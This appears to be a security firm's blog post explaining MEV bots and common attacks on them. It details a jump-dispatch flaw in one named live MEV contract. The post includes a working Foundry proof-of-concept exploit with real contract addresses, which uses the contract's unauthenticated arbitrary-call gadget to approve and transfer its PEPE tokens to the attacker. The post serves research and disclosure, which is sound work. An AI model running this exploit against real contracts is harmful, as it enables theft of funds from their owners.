pepsipu

July 21, 2023

Your Sandwich Is My Lunch: How to Drain MEV Contracts V2

How Zellic found a bug in a top MEV contract

Introduction

Ethereum is a dark forest↗. Bots listen to incoming transactions on the network and submit their own before the normal user — a process called front-running. Front-running makes bots millions↗ per month in MEV. However, MEV bots are vulnerable to several security issues.

During the process of researching for this post, we identified a gas optimization bug in one of the largest MEV bots on Ethereum: 0x2387…8CDB↗. It allows us to collect all the ERC-20 tokens the contract owns and is approved for.

What Is MEV?

Maximal extractable value (MEV) is a metric of a transaction’s value to bots. For example, a buy transaction for a coin is valuable to holders of that coin, and a sell transaction for a coin a user is borrowing against is valuable to bots that liquidate undercollateralized loans. By becoming a benefitting party, such as a holder of a token or a liquidator of a position, bots can extract value from a transaction. The theoretical limit of the value that bots can get out of a transaction is called MEV.

Sandwiches are a specific type of MEV. By leveraging transactions that buy and sell tokens, bots enter advantageous positions before a user’s transaction gets executed — a process known as front-running. Then, after the transaction executes, the bot immediately exits the position. For example, the bot buys $PEPE, the user buys $PEPE, and then the bot sells $PEPE.

There are more subtle types of MEV too. When a token is mispriced on different markets, such as Uniswap V2 and V3, bots will buy from the cheaper one to sell to the more expensive one. This process is known as arbitrage.

Liquidations, another form of MEV, are a driving force for arbitrage and sandwiches. When a user’s loan is undercollateralized — the value of the user’s collateral isn’t enough to cover the loan — it is subject to liquidation. Bots liquidate the loan, collecting their collateral and selling it on the open market. These price movements form arbitrage and sandwich opportunities.

These MEV opportunities typically require front-running in one way or another. Front-running is done by bribing a miner to include a bot’s transaction first. This bribe also needs to be larger than other bots’ bribes competing for the same value extraction opportunity. Competition in MEV has caused some bots to forfeit over 99% of the extracted value to the bribe. The three transactions are added to a bundle, an atomic list of transactions sent to miners, which explicitly tells them to either include all three in order or none at all.

Now that we know the principles of MEV, we can explore where bots go wrong in extracting it.

Common MEV Attacks

Salmonella Attacks

Attacking MEV bots isn’t new. The salmonella attack↗ creates poisoned tokens that, when bought, provide a fraction of the tokens the buyer expects to receive. By buying a large sum of this token in the public transaction pool, an attacker can bait bots into sandwiching them. They’ll start by buying the poisoned token before the attacker, but they’ll receive too few tokens to sell.

However, modern bots mitigate this attack variety with simulations. If sandwiching a transaction doesn’t turn a profit in simulation, they won’t attempt it. Additionally, if the attacker contract conditionally pays the builder (for example, sends 0.1 ETH to the address returned by the COINBASE instruction if and only if profit is made), transactions that don’t make money aren’t included. For the most part, this prevents them from getting exploited. But if an attacker can find a discrepancy between the simulation and live chain, some bots will pick up their poisoned transactions.

Take a look at this tweet↗ by @bertcmiller↗. By checking if the current block is being mined by the Flashbots builder, a malicious token could discriminate between simulation and on chain to conditionally trigger the fractional payout. Profit looks good in simulation, but on chain, it’s a whole other story.

However, it’s reasonable to assume the transaction will fail because, without profit, nobody will bribe the miner for inclusion. No problem — the malicious token pays the miner itself, ensuring the victim’s purchase goes through.

Ommer Attacks

Sometimes, when building the blockchain, two new blocks are created instead of one. Although the blockchain will decide what block to choose with fork choice rules↗, the unincluded block, called the ommer or uncle block, leaks bundles. A bundle included in the ommer will be public to everyone on the blockchain, which allows malicious bots to ruin the atomicity MEV bots expect from their bundles. For example, a bot can pick out only the first buy transaction of another bot’s bundle and sandwich the transaction by including it in a new block.

This has happened many times before. For example, in this post↗ by Elan Halpern, Halpern details trying to find evidence of these uncle bandit attacks occurring. The attacker only made 0.4 ETH — a relatively insignificant sum for MEV attacks — but ommers happen frequently enough to make this a valid money-making strategy.

Modern bots mitigate this attack by only allowing their transactions to succeed in blocks with a specific block ID. If the transaction is included in a block the bot didn’t intend, it’ll fail.

Gas Optimization Gone Wrong

Many bots rely on smart contracts to extract MEV since they can perform atomic operations and include checks to prevent the aforementioned attacks. However, smart contracts require gas — the currency of computation on Ethereum. So, in order to keep gas costs down, writers of MEV bots attempt to make their contracts as concise and inexpensive as possible. One of these optimizations is in function calling.

Efficient Function Calling?

In Solidity, the typical language used to write smart contracts, calling a function looks a little something like this under the hood:

The user gives the program a function hash. This is the keccak256 hash of the signature of the function the caller wants to call. For example, if they wanted to call transfer(address,uint256), they’d send the bytes a9059cbb.
The program will sequentially compare this hash to the list of public functions it has. Once it’s located a match, it’ll jump to the function.

However, this is gas hungry. Checking what hashes map to which functions require several comparisons and extra code. Is there a cheaper option?

Yes. The contract to be the object of our study, 0x2387…8CDB↗, is a competitive mixed sandwich and arbitrage bot that grosses around $1,000 a day. Its recent rankings on the EigenPhi↗ MEV leaderboards have attracted a lot of attention. How does it save gas?

We’ll need to look at the bytecode↗.

We see that it does a CALLDATALOAD instruction to load the first 256 bits of calldata onto the stack. By running the SHR 0xf0 opcode, the contract extracts the last 16 bits from the calldata. Then, *JUMPI will jump to it.

In short, the contract reads the calldata we feed it and then jumps to the code address in that data. It doesn’t have a list of functions, it just executes the code at the address we specify. The idea is that Solidity’s function hash comparisons are needlessly complicated — why not just specify the address of the function in the code and save on gas?

Here’s a diagram of the two function-calling paradigms:

Although the address jump paradigm looks safe, it opens several issues. There’s no reason we need to specify the start of a function as the address. Why not jump into the middle of a function? Perhaps we could cause the contract to invoke a routine reserved for the owner of the contract by jumping past the authentication checks? All we need is a JUMPDEST instruction where we want to jump.

Sure enough, perusing through the bytecode, there’s a handy code segment that can be used to call any contract, authentication checks omitted:

There are three main segments to this bytecode. Recall the first 16 bits are being used to specify the code address. The first segment loads the calldata from the caller using CALLDATACOPY. The second-to-last segment loads the Ethereum address to call the caller, starting at index CALLDATASIZE - 0x16. The final segment does the actual arbitrary call.

The upshot is that we can call an arbitrary address with arbitrary calldata. This is a powerful primitive. What could we use it for?

The contract is holding on to $14 of $PEPE tokens. We can initiate an ERC-20 approval to transfer the tokens from the contract to our wallet.

To simulate this attack, we’ll be using Foundry↗. It’ll let us fork mainnet to verify this attack actually works. We can create a Solidity contract that interfaces with both the $PEPE token and the target contract. Let’s start with this boilerplate:

// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;

import "forge-std/Test.sol";
// erc20
import {ERC20} from "openzeppelin-contracts/token/ERC20/ERC20.sol";

contract PEPEThief is Test {
    // define pepe erc20 contract
    ERC20 pepe = ERC20(0x6982508145454Ce325dDbE47a25d4ec3d2311933);
    address mev = address(0x23873a6B44CF6836129a0d2BFe6f76d57cAc8CDB);
    address owner = address(this); 

    function setUp() public {
        uint256 forkId = vm.createFork("<your eth node here>");
        vm.selectFork(forkId);
    }
        function testWithdraw() public {
                // your exploit here
        }
}

Foundry allows us to quickly test our exploit by running forge test. This will run all public functions prefixed with “test-”, including testWithdraw.

Using what we know about the bytecode, we can write a function that creates our calldata with the code segment we’d like to call, 03D7; the calldata we want to send; an approval for withdrawing all $PEPE to the attacker’s wallet; and the address we’d like to call, the $PEPE ERC-20 contract. Let’s call the function approveTransfer.

function approveTransfer(uint256 balance) private {
    bytes memory calldat = abi.encode(owner, balance);
    bytes4 selector = bytes4(keccak256(bytes("approve(address,uint256)"))); 
    bytes memory data = abi.encodePacked(uint16(0x03d7), selector, calldat, pepe);
    assembly {
        pop(call(gas(), sload(mev.slot), 0, add(data, 32), mload(data), 0x0, 0x0))
    }
}

Here, we create calldat, a variable that holds a part of our calldata to the pepe address. The other part of the calldata is selector, which is the hash of the Solidity function we’d like to call. We use the ABI library to concatenate and pack our calldata into one final variable for the MEV contract, data. Using some in-line assembly, we can call the contract with data as our calldata.

Let’s use this function in our test case to see the transfer of funds.

function testWithdraw() public {
    console.log("balance owner", pepe.balanceOf(owner));
    console.log("balance mev", pepe.balanceOf(mev));

    console.log("doing transfer");
    uint256 balance = pepe.balanceOf(mev);
    approveTransfer(balance);
    pepe.transferFrom(mev, owner, balance);

    console.log("balance owner", pepe.balanceOf(owner));
    console.log("balance mev", pepe.balanceOf(mev));
}

In the end, you’ll be rewarded with your hard-earned $PEPE:

However, we will not withdraw this (insignificant) sum on mainnet because attacking smart contracts without permission is illegal. We attempted to get in contact with the author of the contract, but as they are anonymous, we were not able to. Meanwhile, the amount of money in the contract is negligible, and we believe the benefit of a educational security example for developers is invaluable.

Conclusion

Writing MEV bots is hard. There are a lot of opportunities to introduce subtle bugs while optimizing contracts for efficiency and gas, such as the “gadget jump” seen here. That’s why having a second pair of eyes when writing for the blockchain is so important.

The best one can do as an ordinary user is install Flashbots Protect↗. MEV bots won’t see transactions in the waiting pool, so they won’t know when to sandwich a user.

About Us

Zellic specializes in securing emerging technologies. Our security researchers have uncovered vulnerabilities in the most valuable targets, from Fortune 500s to DeFi giants.

Developers, founders, and investors trust our security assessments to ship quickly, confidently, and without critical vulnerabilities. With our background in real-world offensive security research, we find what others miss.

‍Contact us↗ for an audit that’s better than the rest. Real audits, not rubber stamps.

Your Sandwich Is My Lunch: How to Drain MEV Contracts V2

Introduction

What Is MEV?

Common MEV Attacks

Salmonella Attacks

Ommer Attacks

Gas Optimization Gone Wrong

Efficient Function Calling?

Conclusion

About Us

About us

What we do

Follow us

Introduction​

What Is MEV?​

Common MEV Attacks​

Salmonella Attacks​

Ommer Attacks​

Gas Optimization Gone Wrong​

Efficient Function Calling?​

Conclusion​

About Us​

Introduction

What Is MEV?

Common MEV Attacks

Salmonella Attacks

Ommer Attacks

Gas Optimization Gone Wrong

Efficient Function Calling?

Conclusion

About Us